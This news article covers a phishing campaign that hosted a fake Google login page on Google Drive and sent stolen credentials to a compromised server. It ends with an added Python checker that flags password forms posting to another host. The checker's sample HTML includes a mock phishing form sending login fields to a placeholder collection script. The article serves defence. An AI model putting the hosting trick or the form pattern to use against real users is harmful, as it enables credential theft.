A complex phishing campaign that leverages Google Drive would be hard for users to recognize as a scam, researchers said.
Potential victims receive an email with the subject line “Documents” that encourages them to click on a link to a purportedly important document, said Nick Johnston of Symantec in a blog post.
Clicking on the link takes a user to a login page that looks the same as the one used for Google’s many online services.
That fake login page is “actually hosted on Google’s servers and is served over SSL [Secure Sockets Layer], making the page even more convincing,” Johnston said.
“The scammers have simply created a folder inside a Google Drive account, marked it as public, uploaded a file there and then used Google Drive’s preview feature to get a publicly-accessible URL to include in their messages,” he said.
If a user takes the bait, their login and password are sent to a PHP script on a compromised Web server, Johnston said. The fake login page subsequently redirects to Google Docs documents.
“Google accounts are a valuable target for phishers, as they can be used to access many services including Gmail and Google Play, which can be used to purchase Android applications and content,” Johnston said.
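Because the page's URL and SSL certificate are genuine in this campaign, the remaining tell is where the form sends the password. The following check is an added example, not code from Symantec or this article: it flags password forms whose action resolves to a different host than the one serving the page. The function names, hostnames and sample HTML are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Record each <form>'s action and whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []     # one dict per form: {"action", "has_password"}
        self._open = None   # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (a.get("type") or "").lower() == "password":
                self._open["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def offsite_credential_posts(page_url, html):
    """Return action URLs of password forms that post to a host other than the page's."""
    collector = FormCollector()
    collector.feed(html)
    page_host = urlsplit(page_url).hostname
    # urljoin resolves empty or relative actions against the page itself.
    targets = [urljoin(page_url, f["action"])
               for f in collector.forms if f["has_password"]]
    return [t for t in targets if urlsplit(t).hostname != page_host]


# Constructed sample: login page served from a trusted host, but the password
# form posts to a script on an unrelated server (hostnames are placeholders).
PAGE_URL = "https://trusted-host.example/preview/login.html"
SAMPLE_HTML = """
<form action="http://compromised-site.example/collect.php" method="post">
  <input type="text" name="Email"><input type="password" name="Passwd">
</form>
<form action="/search"><input type="text" name="q"></form>
"""

if __name__ == "__main__":
    print(offsite_credential_posts(PAGE_URL, SAMPLE_HTML))
```

Legitimate sites sometimes post logins to a sibling host, so a hit is a signal to compare against an allowlist of expected login endpoints. Forms submitted by script rather than by an `action` attribute are not covered by this check.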